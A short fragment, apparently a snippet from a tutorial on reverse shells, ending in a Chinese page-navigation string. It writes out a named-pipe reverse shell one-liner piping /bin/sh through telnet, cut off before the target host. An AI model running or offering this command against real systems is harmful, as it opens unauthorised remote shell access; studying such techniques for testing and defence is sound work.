You can also create pipe redirections like we did in the netcat reverse shell : With mkfifo : rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet ...
確定! 回上一頁